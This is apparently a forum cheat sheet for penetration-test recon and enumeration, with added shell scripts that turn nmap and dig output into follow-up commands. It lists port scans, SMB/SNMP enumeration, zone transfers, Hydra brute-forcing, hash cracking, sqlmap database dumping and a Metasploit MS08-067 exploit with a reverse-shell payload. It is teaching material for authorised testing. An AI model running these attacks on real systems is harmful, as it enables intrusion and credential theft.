Essential Recon & Enumeration Commands

by x32x01

Recon and Enumeration for Ethical Hacking 🕵️‍♂️

Reconnaissance (recon) and enumeration are the first phases of a penetration test. They map live hosts, open ports, running services and their versions, and likely weaknesses, so that any exploit you launch later is aimed at something that actually exists on the target. Let's break down the most useful tools and commands every ethical hacker should know 👇

Nmap - Network Discovery Tool 🌐

Nmap is the most widely used network scanner. It finds live hosts, open ports, service versions and operating systems, and can tell filtered (firewalled) ports from closed ones.

Common Commands:
  • nmap -v -sS -A -T4 target → TCP SYN scan of the 1000 most common ports with -A (OS detection, version detection, default NSE scripts and traceroute) and aggressive timing; -sS needs root
  • nmap -p- target → Scan all 65535 TCP ports (the default scans only the top 1000)
  • nmap localhost → Scan the common TCP ports on your own machine, a quick way to see what you are exposing
Nmap also ships with hundreds of NSE scripts; search them by protocol name:
ls /usr/share/nmap/scripts/* | grep ftp
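The point of a scan is what you do with the results. The script below is an added example, not code from the original post: it reads Nmap's grepable output (nmap -oG), keeps only ports whose state is exactly open, and prints the enumeration command from this post that fits each service. The scan report embedded in it is constructed, and the port-to-tool mapping and the users.txt file name are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not code from the original post: parse Nmap grepable output (-oG)
# into "ip port proto service" lines, then map each open service to the follow-up
# enumeration command from this post. The scan data below is constructed.

# Constructed output of `nmap -sV -oG - 192.168.1.0/24`. Fields are tab-separated and
# each port entry is port/state/protocol/owner/service/rpcinfo/version/.
SAMPLE_GNMAP=$(printf '%s\t%s\n' \
  'Host: 192.168.1.10 ()' 'Status: Up' \
  'Host: 192.168.1.10 ()' 'Ports: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//Apache httpd 2.4.52/, 445/open/tcp//microsoft-ds//Samba smbd 4.6.2/, 161/open|filtered/udp//snmp///' \
  'Host: 192.168.1.20 ()' 'Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 25/filtered/tcp//smtp///')

# Read -oG output on stdin, print one "ip port proto service" line per port whose
# state is exactly "open" ("open|filtered" UDP guesses and filtered ports are skipped).
open_services() {
    awk -F'\t' '
        /^Host:/ {
            split($1, h, " ")                 # "Host: 192.168.1.10 ()" -> h[2] is the IP
            ip = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entry, /, /)
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")   # f[1]=port f[2]=state f[3]=proto f[5]=service
                    if (f[2] == "open") printf "%s %s %s %s\n", ip, f[1], f[3], f[5]
                }
            }
        }'
}

# Read "ip port proto service" lines and print the enumeration command to run next.
# This is a dry run: it prints commands, it does not execute them. The mapping is
# an assumption for the example (users.txt is a hypothetical username list).
suggest_followups() {
    while read -r ip port proto service; do
        case "$service" in
            microsoft-ds|netbios-ssn) echo "enum4linux -a $ip" ;;
            snmp)                     echo "snmpwalk -c public -v1 $ip" ;;
            http|https)               echo "nikto -h $ip -p $port" ;;
            ftp|ssh|smtp|pop3)        echo "hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s $port $ip $service" ;;
            *)                        echo "nmap -sV -p $port $ip" ;;
        esac
    done
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_GNMAP" | open_services | suggest_followups
```

Run a real scan with `nmap -sV -oG scan.gnmap 192.168.1.0/24` and feed the file in with `open_services < scan.gnmap | suggest_followups`; review the printed commands before piping them to sh, since the UDP SNMP guess is deliberately dropped and you may want to confirm it with a UDP scan first.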



SMB & SNMP Enumeration 🧠

SMB (Server Message Block) is the Windows file and printer sharing protocol (TCP 445, plus NetBIOS on 137-139); Samba implements it on Linux. Unauthenticated or null-session access can leak share names, user lists and OS details.

Commands:
  • nbtscan 192.168.1.0/24 → Sweep a subnet for NetBIOS names (Windows and Samba hosts)
  • enum4linux -a target-ip → Run every enumeration check (shares, users, groups, password policy, OS info)

SNMP Enumeration:
SNMP runs over UDP port 161, so a TCP-only scan will not show it, and read access is gated only by a community string; "public" is still the default on many devices.
  • snmpwalk -c public -v1 192.168.1.X → Walk the whole MIB tree with community "public": system description, interfaces, routes, running processes, sometimes user names
  • onesixtyone -c names -i hosts → Try each community string in the file names against each host in the file hosts



DNS & Web Enumeration 🌍

DNS and web enumeration discover subdomains, mail and name servers, and hidden content on web servers.

Commands:
  • dnsrecon -d example.com -t std → Standard record enumeration (SOA, NS, MX, A, AAAA, SRV)
  • dig axfr example.com @ns1.example.com → Request a zone transfer from the authoritative server; if it is misconfigured to allow this you get every record in the zone, otherwise dig reports "Transfer failed"
  • nikto -h target → Scan a web server for known dangerous files, outdated software and misconfigurations
  • dirbuster → Brute-force hidden directories and files with a wordlist (GUI tool)
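A zone transfer that succeeds hands you the full host list, so the useful next step is to turn that output into targets. The script below is an added example, not code from the original post: it processes dig's AXFR output, checks for the refusal message first (the usual outcome), and otherwise extracts unique host names and A-record addresses ready for nmap -iL. The zone data in it is constructed and uses documentation addresses.

```shell
#!/bin/sh
# Added example, not code from the original post: process the output of
# `dig axfr example.com @ns1.example.com`. A successful transfer dumps the whole zone;
# the usual result is a refusal, which this code detects instead of printing nothing.
# The zone below is constructed (RFC 5737 documentation addresses).

SAMPLE_AXFR=$(printf '%s\n' \
  '; <<>> DiG 9.18.1 <<>> axfr example.com @ns1.example.com' \
  'example.com.       3600  IN  SOA    ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600' \
  'example.com.       3600  IN  NS     ns1.example.com.' \
  'www.example.com.   3600  IN  A      192.0.2.10' \
  'mail.example.com.  3600  IN  A      192.0.2.25' \
  'dev.example.com.   3600  IN  CNAME  www.example.com.' \
  'vpn.example.com.   300   IN  A      192.0.2.40' \
  'example.com.       3600  IN  SOA    ns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600' \
  ';; Query time: 12 msec')

# Reads dig output on stdin. Returns 1 when the server refused the transfer; otherwise
# prints each host name that has an A, AAAA or CNAME record, deduplicated, without the
# trailing dot. Comment lines (starting with ";") and SOA/NS records are ignored.
axfr_hosts() {
    data=$(cat)
    case "$data" in
        *'Transfer failed'*) return 1 ;;
    esac
    printf '%s\n' "$data" |
        awk '$1 !~ /^;/ && ($4 == "A" || $4 == "AAAA" || $4 == "CNAME") { sub(/\.$/, "", $1); print $1 }' |
        LC_ALL=C sort -u
}

# Same input; prints the unique IPv4 addresses from A records, one per line,
# which is the format `nmap -iL targets.txt` expects.
axfr_ips() {
    awk '$1 !~ /^;/ && $4 == "A" { print $5 }' | LC_ALL=C sort -u
}

# Stand-alone run against the constructed zone.
printf '%s\n' "$SAMPLE_AXFR" | axfr_hosts
printf '%s\n' "$SAMPLE_AXFR" | axfr_ips
```

Against a real domain: `dig axfr example.com @ns1.example.com | axfr_ips > targets.txt || echo "transfer refused, fall back to dnsrecon -t brt"`. Name servers from `dnsrecon -t std` should each be tried, since one secondary is sometimes left open when the primary is not.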



Brute Force & Password Cracking 🔐

Hydra brute-forces network logins (FTP, SSH, POP3, SMTP, HTTP forms and many more). -l gives one username, -L a username list, -p one password, -P a password list.

Examples:
  • hydra -l user -P /usr/share/wordlists/rockyou.txt target ftp → One username, the rockyou list, against FTP
  • hydra -L users.txt -P passwords.txt target smtp → Username and password lists against SMTP (Hydra needs -l or -L; a run with only -P fails with "you must supply a login name")

John the Ripper cracks password hashes offline:
  • john --wordlist=rockyou.txt hashes → Dictionary attack on the hashes in file hashes; add --format= if John guesses the hash type wrong, and john --show hashes prints what was cracked



Exploit Development 💣

Once a vulnerability is confirmed, exploit it only in a lab or on systems you are authorised to test.

Compiling exploits:
  • gcc -o exploit exploit.c → Compile for Linux
  • i586-mingw32msvc-gcc exploit.c -o exploit.exe → Cross-compile for Windows (on current distributions the package is mingw-w64 and the compiler is named i686-w64-mingw32-gcc, or x86_64-w64-mingw32-gcc for 64-bit)

Metasploit:
  • use exploit/windows/smb/ms08_067_netapi → The classic SMB exploit for MS08-067 (unpatched Windows XP / Server 2003)
  • set payload windows/meterpreter/reverse_tcp → Reverse shell payload; then set RHOSTS to the target, LHOST to your own address, and run



Networking & IP Basics 📡

Quick networking essentials every hacker should know:

Default initial TTL by OS (the value you see in a reply is this minus the number of hops in between):
  OS       TTL
  Windows  128
  Linux    64
  Cisco    255

Private IP Ranges (RFC 1918):
  • 10.0.0.0 - 10.255.255.255 (10.0.0.0/8)
  • 172.16.0.0 - 172.31.255.255 (172.16.0.0/12)
  • 192.168.0.0 - 192.168.255.255 (192.168.0.0/16)
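Both of these tables get applied by hand during recon: a reply TTL of 54 means a Linux box about ten hops away, and an address like 172.32.0.1 is not private even though it starts with 172. The script below is an added example, not code from the original post; it implements those two checks, including the hop arithmetic and the 172.16/12 boundary, and the input values at the bottom are constructed.

```shell
#!/bin/sh
# Added example, not code from the original post: the two checks the TTL table and the
# private-range list are used for in practice. Input values below are constructed.

# Estimate OS family and hop distance from the TTL seen in a reply (ping, nmap -sn,
# a captured packet). Default initial TTLs: 64 Linux/Unix, 128 Windows, 255 Cisco and
# most network gear. Each router decrements TTL by one, so round up to the next default
# and the difference is the hop count. Returns 2 for a value outside 1..255.
guess_os_from_ttl() {
    ttl=$1
    { [ "$ttl" -ge 1 ] && [ "$ttl" -le 255 ]; } 2>/dev/null || return 2
    if   [ "$ttl" -le 64 ];  then base=64;  os="Linux/Unix"
    elif [ "$ttl" -le 128 ]; then base=128; os="Windows"
    else                          base=255; os="Cisco/network device"
    fi
    echo "$os hops=$((base - ttl))"
}

# Return 0 if $1 is an RFC 1918 address, 1 if it is a valid public IPv4 address,
# 2 if it is not a dotted quad at all. 172.16.0.0/12 covers 172.16.x.x through
# 172.31.x.x only; 172.32.x.x is public, which is the usual mistake.
is_private_ipv4() {
    ip=$1
    case "$ip" in
        ''|*.*.*.*.*|*[!0-9.]*|*..*|.*|*.) return 2 ;;   # wrong shape
        *.*.*.*) ;;                                       # exactly four numeric octets
        *) return 2 ;;
    esac
    a=${ip%%.*}; rest=${ip#*.}
    b=${rest%%.*}; rest=${rest#*.}
    c=${rest%%.*}; d=${rest#*.}
    for octet in "$a" "$b" "$c" "$d"; do
        [ "$octet" -le 255 ] || return 2
    done
    case "$a" in
        10)  return 0 ;;
        172) [ "$b" -ge 16 ] && [ "$b" -le 31 ] && return 0 ;;
        192) [ "$b" -eq 168 ] && return 0 ;;
    esac
    return 1
}

# Stand-alone demonstration on constructed values.
for t in 54 117 250; do
    echo "ttl=$t -> $(guess_os_from_ttl "$t")"
done
for ip in 10.1.2.3 172.31.255.254 172.32.0.1 192.168.0.1 8.8.8.8 300.1.1.1; do
    is_private_ipv4 "$ip"; rc=$?
    echo "$ip -> private=$rc (0 yes, 1 no, 2 invalid)"
done
```

The TTL guess is only a hint: a host behind NAT or a proxy reports the TTL of the device answering for it, and some systems (Solaris, older AIX) use 255 as well. The private-range check is what you run over a list of discovered addresses before deciding which ones are in scope for an internal versus an external test.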



SQLMap - SQL Injection Automation 💾

SQLMap detects and exploits SQL injection automatically, from finding the injectable parameter to dumping databases.

Examples:
  • sqlmap -u "http://target.com/?id=1" --dbs → Test the id parameter and, if injectable, list the databases
  • sqlmap -u "http://target.com/" --forms --crawl=10 → Crawl the site up to ten links deep and test every form it finds



Final Thoughts 💡

Recon and enumeration are the foundation of penetration testing. Tools like Nmap, Hydra, DNSRecon, and SQLMap uncover the information every later step depends on, but only use them against systems you are authorised to test ⚖️
 